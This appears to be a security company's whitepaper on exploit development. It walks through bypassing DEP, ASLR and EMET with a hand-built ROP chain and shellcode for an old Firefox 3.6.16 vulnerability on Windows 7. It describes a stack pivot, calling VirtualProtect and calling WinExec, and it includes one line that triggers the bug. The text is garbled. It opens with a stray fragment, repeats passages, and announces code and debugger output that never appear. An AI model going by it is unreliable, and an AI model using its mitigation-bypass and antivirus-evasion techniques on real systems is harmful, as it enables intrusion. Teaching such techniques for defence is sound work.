The stack frame the block between esp and ebp

Whitepaper on

Information Security Services, Products & Trainings

Data Execution Prevention (DEP) is a security feature included in modern operating systems. It is known to be available in Linux, Mac OS X, and Microsoft Windows operating systems and is intended to prevent an application or service from executing code from a non-executable memory region. Whereas Address space layout randomization (ASLR) is a computer security technique which involves randomly arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, in a process's address space. In this paper we will cover the techniques to bypass these security mechanisms. We will also look at how custom shellcodes are developed, and this paper also looks at the EMET (Enhanced Mitigation Experience Toolkit) bypass.

The above leak is little old now, and provides us with a memory address inside mshtml.dll at the address rendered by a.toString(16)-1 This was a good pointer to pointer, similarly, 0x7ffe360 in this line you can find the base address of ntdll.dll in win7 64 bit whereas in all windows 32 bit versions, 7ffe300 has the address of sysenter and 0x7ffe304 the ret instruction. But all these are pointer to pointers i.e. ** whereas to form a shellcode dynamically, we need a direct pointer. The custom shellcodes manufactured dynamically from memory leaks of pointers, can be simple and provide us with more control, than the other traditional shellcodes developed by msf etc. The main advantage of custom shellcodes made by pointer leaks are that, you can easily evade the mitigations like, EMET (enhanced mitigation toolkit) and other AV engines. Let us proceed with an example. The example vulnerability (mchannel) is affecting Firefox 3.6.16.

Let us proceed with the example and in coding. The example vulnerability (mchannel) is affecting Firefox 3.6.16 and its working exploits are already available. But we'll develop the ROP and shellcode manually and hand crafted without any need for automated scripts as in some cases automation misses certain points and makes the things complex and the solutions are not so intelligent and simple.

In code we have to place a blank space between "%" and "u" as unicode support is converting the blocks into respective characters, remember to remove these spaces from all blocks inside unescape blocks. We are going to develop this exploit for win7 -win32 (you may check offsets for winxp, even offsets in win32 & wow64 win7 also differs check them and fix them). Also install the EMET from Microsoft’s website. It mitigates most of the shellcodes. But our shellcode will also bypass it and will be compact.

The Result of above code:

There are certain instructions like:

or like these can be of help. We could not find anything useful. But following gadget was discovered:

This gadget needs the address to be loaded into eax register at place where ECX register is pointing. The ECX register points to first bytes of our heap block and then the next call will be made to the address at ECX + 8. And the debugger out put:

We need to place the first gadget address at 0C100018: 0D 01 0E 1E and change the 0C100000: 01 01 02 01 with address to (address of offset to the address of next gadget[ XCHG EAX,ESP;ret ])-8 that is at "%u 0107%u 0108" if at 0x0C100000 has 0x0C100004

See the following code section:

And this will result into our heap block transformed into stack as shown below:

We have completed the first phase with successful stack pivot, so the next return instruction will land on the address in our stack (our heap block). Now next phase is to get a pointer to the kernel32.VirtualProtect function and put its arguments on our stack to bypass the DEP.

The instruction that will cause trouble is LEAVE it fixes the stack by dissolving the stack frame. The stack frame is the block between ESP and EBP, and until now the EBP register points to an address that will make us lose our stack once again, so the EBP must contain an address just before the start of shellcode. Now we have the following code:

e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0);

Now comes the next phase of our mission, the shellcode formation. We have two registers containing addresses within GR469A~1.dll

Remember interchange the bytes in pair, if the number of bytes is odd then the begining of last pair can be made to a nop 90. Then we will take the address of Kernel32 address into EAX register from pointer to pointer [EDI]:

Now we need to calculate the offset:

Then we'll push 5 as an argument to WinExec.

Then we have ecx pointing to somewhere in our heap block.

and push ecx on stack

And finally after spending a lot of time, we have the exploit code ready.  The complete exploit

ABOUT SECFENCE:
Secfence Technologies is a pure-play Information Security Company based out of India providing InfoSec Services, Trainings & Products. We focus on both offensive and defensive sides of security. For more details visit